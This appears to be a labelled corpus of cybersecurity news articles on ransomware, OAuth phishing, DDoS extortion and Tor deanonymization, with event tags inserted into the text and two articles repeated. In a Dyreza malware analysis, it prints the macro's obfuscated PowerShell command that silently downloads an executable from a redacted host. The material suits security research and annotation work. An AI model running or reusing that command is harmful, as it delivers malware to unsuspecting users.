West Haven officials said Thursday they paid the money Attack.Ransom to anonymous attackers through the digital currency Bitcoin . A Connecticut city has paid Attack.Ransom USD 2,000 to restore access to its computer system after a ransomware attack Attack.Ransom . West Haven officials said Thursday they paid the money Attack.Ransom to anonymous attackers through the digital currency bitcoin to unlock 23 servers and restore access to city data . The attack Attack.Ransom disabled servers early Tuesday morning , and city officials say it was contained by 5:30 PM Wednesday . City attorney Lee Tiernan says officials initially did n't want to pay the ransom Attack.Ransom , but research showed it was the best course of action . The city says there 's no reason to believe data was compromised Attack.Databreach . Employee pay was not affected . The US Department of Homeland Security says the attack came from outside the US . An investigation is ongoing .

Forcepoint security labs has identified a form of ransomware , first documented back in September 2016 that targets healthcare organisations . ‘ Philadelphia ’ , believed to be a new version of ‘ Stampedo ’ currently shows patterns that could be the beginning of a widening targeting campaign , extending beyond US perimeters . Sold for just a few hundred dollars and promoted on YouTube , it gives have-a-go criminals , on a global scale , the tools to conduct very targeted and convincing attacks . The attack Attack.Phishing is sent Attack.Phishing through a spear-phishing email containing tailored logos and staff names , adding to the deception . Once activated the variant communicates information including operating system , username , country and system code back to its command and control and generates a victim ID , bitcoin wallet ID and bitcoin ransom price . Carl Leonard , principal security analyst at Forcepoint , said : “ While processing our open source intelligence feeds we discovered Philadelphia , currently a cheap , poorly written ransomware that is available cheaply to script kiddies . Although the ransom Attack.Ransom is currently only 0.3 BTC , the command and control paths suggest that the actor is targeting hospitals for this campaign so there are likely to be other targets

The Russian hacking group blamed for targeting U.S. and European elections has been breaking into Attack.Databreach email accounts , not only by tricking Attack.Phishing victims into giving up passwords , but by stealing Attack.Databreach access tokens too . It 's sneaky hack that 's particularly worrisome , because it can circumvent Google 's 2-step verification , according to security firm Trend Micro . The group , known as Fancy Bear or Pawn Storm , has been carrying out the attack Attack.Phishing with its favored tactic of sending out Attack.Phishing phishing emails , Trend Micro said in a report Tuesday . The attack Attack.Phishing works by sending out Attack.Phishing a fake email , pretending to be Attack.Phishing from Google , with the title “ Your account is in danger. ” An example of a phishing email that Fancy Bear has used Attack.Phishing . The email claims that Google detected several unexpected sign-in attempts into their account . It then suggests users install a security application called “ Google Defender. ” However , the application is actually a ruse . In reality , the hacking group is trying to dupe Attack.Phishing users into giving up a special access token for their Google account , Trend Micro said . Victims that fall for the scheme will be redirected to an actual Google page , which can authorize the hacking group 's app to view and manage their email . Users that click “ allow ” will be handing over what ’ s known as an OAuth token . Although the OAuth protocol does n't transfer over any password information , it 's designed to grant third-party applications access to internet accounts through the use of special tokens . In the case of Fancy Bear , the hacking group has leveraged the protocol to build Attack.Phishing fake applications that can fool Attack.Phishing victims into handing over account access , Trend Micro said . “ After abusing the screening process for OAuth approvals , ( the group ’ s ) rogue application operates Attack.Phishing like every other app accepted by the service provider , ” the security firm said . Even Google 's 2-step verification , which is designed to prevent unwarranted account access , ca n't stop the hack , according to Trend Micro . Google 's 2-step verification works by requiring not only a password , but also a special code sent to a user 's smartphone when logging in . Security experts say it 's an effective way to protect your account . However , the phishing scheme Attack.Phishing from Fancy Bear manages to sidestep this security measure , by tricking Attack.Phishing users into granting access through the fake Google security app . Google , however , said it takes many steps to protect users from such phishing attacks Attack.Phishing . `` In addition , Google detects and reviews potential OAuth abuse and takes down thousands of apps for violating our User Data Policy , such as impersonating Attack.Phishing a Google app , '' the company said in a statement . `` Note that a real Google app should be directly accessed from a Google site or installed from the Google Play or Apple App stores , '' it added . According to Trend Micro , victims were targeted with this phishing attack Attack.Phishing in 2015 , and 2016 . In addition to Google Defender , Fancy Bear has used other apps under names such as Google Email Protection and Google Scanner . They ’ ve also gone after Yahoo users with apps called Delivery Service and McAfee Email protection . The attack Attack.Phishing attempts to trick Attack.Phishing users into handing over access to their email through fake Google third-party applications . “ Internet users are urged to never accept OAuth token requests from an unknown party or a service they did not ask for , ” Trend Micro said . Although a password reset can sometimes revoke an OAuth token , it 's best to check what third-party applications are connected to your email account . This can be done by looking at an email account 's security settings , and revoking access where necessary . Fancy Bear is most notorious for its suspected role in hacking the Democratic National Committee last year . However , the group has also been found targeting everything from government ministries , media organizations , along with universities and think tanks , according to Trend Micro .

The Russian hacking group blamed for targeting U.S. and European elections has been breaking into Attack.Databreach email accounts , not only by tricking Attack.Phishing victims into giving up passwords , but by stealing Attack.Databreach access tokens too . It 's sneaky hack that 's particularly worrisome , because it can circumvent Google 's 2-step verification , according to security firm Trend Micro . The group , known as Fancy Bear or Pawn Storm , has been carrying out the attack Attack.Phishing with its favored tactic of sending out Attack.Phishing phishing emails , Trend Micro said in a report Tuesday . The attack Attack.Phishing works by sending out Attack.Phishing a fake email , pretending to be Attack.Phishing from Google , with the title “ Your account is in danger. ” An example of a phishing email that Fancy Bear has used Attack.Phishing . The email claims that Google detected several unexpected sign-in attempts into their account . It then suggests users install a security application called “ Google Defender. ” However , the application is actually a ruse . In reality , the hacking group is trying to dupe Attack.Phishing users into giving up a special access token for their Google account , Trend Micro said . Victims that fall for the scheme will be redirected to an actual Google page , which can authorize the hacking group 's app to view and manage their email . Users that click “ allow ” will be handing over what ’ s known as an OAuth token . Although the OAuth protocol does n't transfer over any password information , it 's designed to grant third-party applications access to internet accounts through the use of special tokens . In the case of Fancy Bear , the hacking group has leveraged the protocol to build Attack.Phishing fake applications that can fool Attack.Phishing victims into handing over account access , Trend Micro said . “ After abusing the screening process for OAuth approvals , ( the group ’ s ) rogue application operates Attack.Phishing like every other app accepted by the service provider , ” the security firm said . Even Google 's 2-step verification , which is designed to prevent unwarranted account access , ca n't stop the hack , according to Trend Micro . Google 's 2-step verification works by requiring not only a password , but also a special code sent to a user 's smartphone when logging in . Security experts say it 's an effective way to protect your account . However , the phishing scheme Attack.Phishing from Fancy Bear manages to sidestep this security measure , by tricking Attack.Phishing users into granting access through the fake Google security app . Google , however , said it takes many steps to protect users from such phishing attacks Attack.Phishing . `` In addition , Google detects and reviews potential OAuth abuse and takes down thousands of apps for violating our User Data Policy , such as impersonating Attack.Phishing a Google app , '' the company said in a statement . `` Note that a real Google app should be directly accessed from a Google site or installed from the Google Play or Apple App stores , '' it added . According to Trend Micro , victims were targeted with this phishing attack Attack.Phishing in 2015 , and 2016 . In addition to Google Defender , Fancy Bear has used other apps under names such as Google Email Protection and Google Scanner . They ’ ve also gone after Yahoo users with apps called Delivery Service and McAfee Email protection . The attack Attack.Phishing attempts to trick Attack.Phishing users into handing over access to their email through fake Google third-party applications . “ Internet users are urged to never accept OAuth token requests from an unknown party or a service they did not ask for , ” Trend Micro said . Although a password reset can sometimes revoke an OAuth token , it 's best to check what third-party applications are connected to your email account . This can be done by looking at an email account 's security settings , and revoking access where necessary . Fancy Bear is most notorious for its suspected role in hacking the Democratic National Committee last year . However , the group has also been found targeting everything from government ministries , media organizations , along with universities and think tanks , according to Trend Micro .

A group calling itself XMR Squad has spent all last week launching DDoS attacks against German businesses and then contacting the same companies to inform them they had to pay Attack.Ransom €250 ( $ 275 ) for `` testing their DDoS protection systems . '' German DDoS protection firm Link11 reported attacks against DHL , Hermes , AldiTalk , Freenet , Snipes.com , the State Bureau of Investigation Lower Saxony , and the website of the state of North Rhine-Westphalia . The attack Attack.Ransom against DHL Germany was particularly effective as it shut down the company 's business customer portal and all APIs , prompting eBay Germany to issue an alert regarding possible issues with packages sent via DHL . `` They seem to know what to hit , '' said Daniel Smith , security researcher for Radware , and one of the persons currently keeping tabs of the attacks . The group sent emails to all the companies it targeted . In the emails , they did n't ask for a ransom Attack.Ransom to stop the attacks Attack.Ransom , but a fee for having already carried out what they called a DDoS protection test . Usually , these types of groups launch DDoS attacks and then send emails to their victims requesting for payments Attack.Ransom to stop the attacks Attack.Ransom . XMR Squad 's emails looked like invoices for unrequested DDoS tests . Furthermore , the ransom note did n't include payment instructions , which is weird , to say the least . DDoS ransoms Attack.Ransom are usually handled in Bitcoin or another anonymous cryptocurrency . It was strange to see the group ask for payment Attack.Ransom in Euros , as the group 's name included the term XMR , the shortname for Monero , an anonymous cryptocurrency . While the group advertised on Twitter that their location was in Russia , a German reporter who spoke with the group via telephone said `` the caller had a slight accent , but spoke perfect German . '' To the same reporter , the group also claimed they carried out the attacks only to get public attention . The attention they got was n't the one they expected , as their hosting provider took down their website , located at xmr-squad.biz . Germany , in particular , has been the target of several DDoS blackmailers in the past year . In January and February , a group calling itself Stealth Ravens launched DDoS-for-Bitcoin ransom attacks Attack.Ransom . Link11 , who tracked those attacks Attack.Ransom , claimed the group used a DDoS botnet built with the Mirai IoT malware and asked for Attack.Ransom 5 Bitcoin ( $ 6,000 ) to stop attacks Attack.Ransom . Last year in June , another group named Kadyrovtsy also targeted German businesses , launching attacks Attack.Ransom of up to 50 Gbps . This group began DDoS ransom attacks Attack.Ransom a month earlier by first targeting Polish banks . All these groups are following the same modus operandi perfected by groups like DD4BC and Armada Collective . These two groups appeared in the summer and autumn of 2015 and targeted companies worldwide . In January 2016 , Europol arrested suspects believed to be DD4BC members in Bosnia and Herzegovina . Following the arrests , both groups became inactive . After the demise of these two main groups , there was a wave of copycats [ 1 , 2 , 3 , 4 , 5 ] that used their respective reputation to extort payments Attack.Ransom from companies , in many cases without even possessing any DDoS capabilities .

Google Docs was pulled into a sneaky email phishing attack Attack.Phishing on Tuesday that was designed to trick Attack.Phishing users into giving up access to their Gmail accounts . The phishing emails , which circulated Attack.Phishing for about three hours before Google stopped them , invited Attack.Phishing the recipient to open what appeared to be Attack.Phishing a Google Doc . The teaser was a blue box that said , “ Open in Docs. ” In reality , the link led to a dummy app that asked users for permission to access their Gmail account . An example of the phishing email that circulated Attack.Phishing on Tuesday . Users might easily have been fooled Attack.Phishing , because the dummy app was actually named “ Google Docs. ” It also asked for access to Gmail through Google ’ s actual login service . The hackers were able to pull off the attack by abusing the OAuth protocol , a way for internet accounts at Google , Twitter , Facebook and other services to connect with third-party apps . The OAuth protocol doesn ’ t transfer any password information , but instead uses special access tokens that can open account access . However , OAuth can be dangerous in the wrong hands . The hackers behind Tuesday’s attack Attack.Phishing appear to have built Attack.Phishing an actual third-party app that leveraged Google processes to gain account access . The dummy app will try to ask for account permission . Last month , Trend Micro said a Russian hacking group known as Fancy Bear was using a similar email attack method that abused the OAuth protocol to phish Attack.Phishing victims . However , security experts said Tuesday's phishing attack Attack.Phishing probably was n't from Fancy Bear , a shadowy group that many experts suspect works for the Russian government . `` I do n't believe they are behind this ... because this is way too widespread , '' Jaime Blasco , chief scientist at security provider AlienVault , said in an email . On Tuesday , many users on Twitter , including journalists , posted screen shots of the phishing emails , prompting speculation that the hackers were harvesting Attack.Databreach victims ' contact lists to target more users . The attack Attack.Phishing was also sent Attack.Phishing through an email address at `` hhhhhhhhhhhhhhhh @ mailinator.com . '' Mailinator , a provider of a free email service , denied any involvement . Fortunately , Google moved quickly to stop the phishing attacks Attack.Phishing , after a user on Reddit posted about them . “ We ’ ve removed the fake pages , pushed Vulnerability-related.PatchVulnerability updates through Safe Browsing , and our abuse team is working to prevent this kind of spoofing Attack.Phishing from happening again , ” Google said in a statement . Security experts and Google recommend affected users check what third-party apps have permission to access their account and revoke any suspicious access . Users can do so by visiting this address , or performing a Google security check-up . Tuesday's phishing scheme Attack.Phishing will probably push Google to adopt an even stricter stance on apps that use OAuth , said Robert Graham , CEO of research company Errata Security . However , the internet giant has to strike a balance between ensuring security and fostering a flourishing app ecosystem . `` The more vetting you do , the more you stop innovation , '' Graham said . `` It 's a trade-off . ''

A second UK university has been hit Attack.Ransom by a major ransomware attack Attack.Ransom this week , as new figures showed the country is the most frequently targeted by the malware in Europe . The attack Attack.Ransom appears to have struck Northern Ireland ’ s Ulster University on the same day a ransomware outage Attack.Ransom affected University College London ( UCL ) . Ulster Uni ’ s Information Services Division ( ISD ) revealed yesterday that its AV partner suspects a zero-day threat was the cause , also echoing the current thinking at UCL . Three departmental file shares have been affected and remained at “ read only ” access at the time of writing . Like its counterparts at UCL , Ulster University ’ s ISD appears to be following best practice regarding back-ups , which will help mitigate the impact of the attack . It explained : “ ISD take backups of all our shared drives and this should protect most data even if it has been encrypted by the malware . Once we are confident the infections have been contained , then we will restore the most recent back up of the file . ISD can confirm that a backup of the shares was successfully taken at close of business on Tuesday 12th June. ” Fraser Kyne , EMEA CTO at Bromium , urged all UK university IT teams to be on high alert for possible attacks . “ The initial reports are suggesting that the ransomware was able to get in at UCL through a zero-day exploit , which allowed it to bypass antivirus software , ” he added . “ That really underscores the limitations of antivirus ; in that it is only able to stop things that it knows are bad . Given that most malware is only seen once in the wild before it evolves into something different , there ’ s very little that antivirus can offer in the way of protection. ” UCL now believes the initial infection vector was a user visiting a compromised website rather than opening a phishing email attachment as first thought . The latest stats from Malwarebytes show the UK is the hardest hit in Europe when it comes to ransomware . There were three-times as many detections in the UK in Q1 2017 than the next most impacted country : France . In fact , while ransomware infections dropped 4 % across Europe they increased 57 % in the UK year-on-year . The total volume of cyber-attacks on UK firms soared 500 % year-on-year , with no single threat type declining . Across Europe , Italy and the UK were almost tied as having the highest number of malware detections in Europe ; 16.3 % and 16.2 % respectively .

Cyberthreats are a constant risk and affect public administrations significantly . So much so that they have become a powerful instrument of aggression against public entities and citizens . They can lead to a serious deterioration in the quality of service , and also , above all , to data leaks Attack.Databreach concerning everything from personal information to state secrets . The combination of new technologies and the increase in the complexity of attacks , as well as the professionalization of cybercriminals , is highly dangerous . Last December , a large-scale spam campaign spanning more than ten countries was carried out , and specifically targeted a major European ministry . The attack Attack.Phishing , via phishing Attack.Phishing , was highly advanced and combined social engineering tactics with a powerful Trojan . The attack Attack.Phishing is sent Attack.Phishing by email with an attached Word document . At first , we suspected that it was a targeted attack , since the message came , supposedly , from a healthcare company and the recipient was an employee of the Ministry of Health in a European country . The present analysis describes the technical features of the harmful code found in the macro of the Word document . The goal of the macro was to download and run another malicious component . Below are shown a few static properties of the analyzed files . The hash of the Word document is the following : MD5 : B480B7EFE5E822BD3C3C90D818502068 SHA1 : 861ae1beb98704f121e28e57b429972be0410930 According to the document ’ s metadata , the creation date was 2016-12-19 . The malicous code ’ s signature , downloaded by Word , is the following : MD5 : 3ea61e934c4fb7421087f10cacb14832 SHA1 : bffb40c2520e923c7174bbc52767b3b87f7364a9 The Word document gets to the victim ’ s computer by way of a spam email coming from Attack.Phishing a healthcare company . The text tricks Attack.Phishing the recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it . According to the data recovered by Panda Security ’ s Collective Intelligence , this spam campaign took place on December 19 , 2016 and affected several countries . Interactions with the infected system The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself . Also , the macro is designed to run immediately upon being opened . Part of the obfuscated code contained in the macro Once the macro is running , the Word doc runs the following command in the system : cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN ( NeW-oBjECt sYstEm.NeT.webcLiENt ) .DOWNloAdFILE ( ‘ http : //xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe ’ , ’ C : \Users\ ? ? ? ? \AppData\Roaming.eXe ’ The system symbol ( cmd.exe ) runs the powershell with two embedded commands going through parameters : Thanks to the data obtained by the Intelligence Collective at Panda Security , we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family . Panda ’ s clients were protected proactively , without need of signatures or updates . The purpose of the malicious code is to steal Attack.Databreach credentials from browsers and add the compromised machine to bot network . It then waits for commands from the Command & Control Server . These commands come from the cybercriminals that operate it , and is able to download further new malware and carry out all kinds of malicious actions . Digitization in Public Administration leads to the exponential growth of the creation , storage and management of huge quantities of confidential data — data that does not allow for a single oversight

Cyberthreats are a constant risk and affect public administrations significantly . So much so that they have become a powerful instrument of aggression against public entities and citizens . They can lead to a serious deterioration in the quality of service , and also , above all , to data leaks Attack.Databreach concerning everything from personal information to state secrets . The combination of new technologies and the increase in the complexity of attacks , as well as the professionalization of cybercriminals , is highly dangerous . Last December , a large-scale spam campaign spanning more than ten countries was carried out , and specifically targeted a major European ministry . The attack Attack.Phishing , via phishing Attack.Phishing , was highly advanced and combined social engineering tactics with a powerful Trojan . The attack Attack.Phishing is sent Attack.Phishing by email with an attached Word document . At first , we suspected that it was a targeted attack , since the message came , supposedly , from a healthcare company and the recipient was an employee of the Ministry of Health in a European country . The present analysis describes the technical features of the harmful code found in the macro of the Word document . The goal of the macro was to download and run another malicious component . Below are shown a few static properties of the analyzed files . The hash of the Word document is the following : MD5 : B480B7EFE5E822BD3C3C90D818502068 SHA1 : 861ae1beb98704f121e28e57b429972be0410930 According to the document ’ s metadata , the creation date was 2016-12-19 . The malicous code ’ s signature , downloaded by Word , is the following : MD5 : 3ea61e934c4fb7421087f10cacb14832 SHA1 : bffb40c2520e923c7174bbc52767b3b87f7364a9 The Word document gets to the victim ’ s computer by way of a spam email coming from Attack.Phishing a healthcare company . The text tricks Attack.Phishing the recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it . According to the data recovered by Panda Security ’ s Collective Intelligence , this spam campaign took place on December 19 , 2016 and affected several countries . Interactions with the infected system The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself . Also , the macro is designed to run immediately upon being opened . Part of the obfuscated code contained in the macro Once the macro is running , the Word doc runs the following command in the system : cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN ( NeW-oBjECt sYstEm.NeT.webcLiENt ) .DOWNloAdFILE ( ‘ http : //xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe ’ , ’ C : \Users\ ? ? ? ? \AppData\Roaming.eXe ’ The system symbol ( cmd.exe ) runs the powershell with two embedded commands going through parameters : Thanks to the data obtained by the Intelligence Collective at Panda Security , we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family . Panda ’ s clients were protected proactively , without need of signatures or updates . The purpose of the malicious code is to steal Attack.Databreach credentials from browsers and add the compromised machine to bot network . It then waits for commands from the Command & Control Server . These commands come from the cybercriminals that operate it , and is able to download further new malware and carry out all kinds of malicious actions . Digitization in Public Administration leads to the exponential growth of the creation , storage and management of huge quantities of confidential data — data that does not allow for a single oversight

This attack model was brought to light towards the end of 2016 by a team of six researchers , who presented their findings at the Black Hat Europe 2016 security conference in November and the 33rd Chaos Communication Congress held last week . When the ad plays on a TV or radio , or some ad code runs on a mobile or computer , it emits ultrasounds that get picked up by the microphone of nearby laptops , desktops , tablets or smartphones . Speaking at last week 's 33rd Chaos Communication Congress , Vasilios Mavroudis , one of the six researchers , detailed a deanonymization attack Attack.Databreach on Tor users that leaks Attack.Databreach their real IP and a few other details . The attack Attack.Phishing that the research team put together relies on tricking Attack.Phishing a Tor user into accessing a web page that contains ads that emit ultrasounds or accessing a page that contains hidden JavaScript code that forces the browser to emit the ultrasounds via the HTML5 Audio API . According to Mavroudis , the mobile phone must have an app installed that has embedded one of the many advertising SDKs that include support for uXDT . In tests carried out by Mavroudis , the researcher has intercepted Attack.Databreach some of the traffic these ultrasound beacons trigger on behalf of the phone , traffic which contains details such as the user 's real IP address , geo-location coordinates , telephone number , Android ID , IMEI code , and device MAC address . According to Mavroudis , there are multiple ways to deliver these attacks other than social-engineering Tor users to access certain URLs , where these ultrasound beacons can be served . Similarly , the attackers could also run a malicious Tor exit node and perform a Man-in-the-Middle attack , forcibly injecting the malicious code that triggers uXDT beacons in all Tor traffic going through that Tor node . A simpler attack method would also be to hide the ultrasounds , which are inaudible to human ears , inside videos or audio files that certain Tor users might be opening . The FBI might be very interested in this method and could deploy it to track viewers of child pornography videos on the Tor network , just like it previously did in Operation Playpen , where it used a Flash exploit .

A new phishing campaign Attack.Phishing is using a fake iTunes receipt for movie purchases to compromise Apple users ' sensitive information . Fortinet researchers first spotted the phishing campaign Attack.Phishing over the weekend of 17 February . The attack Attack.Phishing begins when an Apple user receives Attack.Phishing a receipt that appears to have come from iTunes . In actuality , an email address based in Norway sent the message . The receipt lists purchases for a series of movies . These films ( which include `` Allied '' , `` Arrival '' , and `` Jack Reacher : Never Go Back '' ) debuted in theaters recently , which makes the ruse relevant and consequently more believable . This email is n't the first time phishers ( or smishers , for that matter ) have targeted Apple users . Users in the United Kingdom , Australia , and the United States have witnessed similar attacks over the past few years . This particular campaign targets Canadian users and seems to have improved upon earlier iterations of the scam . Of course , most users who receive the receipt will wonder why they 've been charged so much money for something they have n't purchased . Their attention will subsequently go to the link at the bottom of the email that claims they can obtain a full refund . But clicking on the link does n't help them in the slightest . As explained by Fortinet 's researchers : `` At the bottom of the receipt , there ’ s a link to request a “ full refund ” in case of an unauthorized transaction . Apple has no need for a user 's Social insurance number , which Canadians need to work for or to access government services , or their mother 's maiden name . But the phishers want their targets to overlook that fact and enter their details . Indeed , doing so would help the attackers assume control of their victim 's credit card and other financial information . This campaign , like so many others , demonstrates the importance of carefully reviewing suspicious emails . Users should look at the sending email address to see if it 's legitimate . If they come across an invoice or receipt for a credit card purchase , they should check their account history for such a transaction . If they do n't find anything , that means scammers are just trying to scare them into handing over their payment card details . Additionally , users might consider setting up transaction notifications on their payment cards . That way , if they have n't received an alert of a transaction , they 'll immediately know that an invoice such as the one above is a fake